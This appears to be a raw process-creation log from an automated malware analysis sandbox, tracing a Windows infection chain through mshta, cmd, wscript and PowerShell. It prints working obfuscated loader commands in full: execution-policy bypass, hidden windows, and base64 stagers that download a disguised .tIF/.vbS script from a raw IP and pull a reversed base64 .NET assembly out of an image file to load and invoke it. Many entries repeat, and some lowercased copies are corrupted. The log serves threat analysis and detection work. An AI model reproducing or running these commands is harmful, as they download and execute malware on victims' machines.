Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC91.tmp" "c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispicule
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispicule
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lk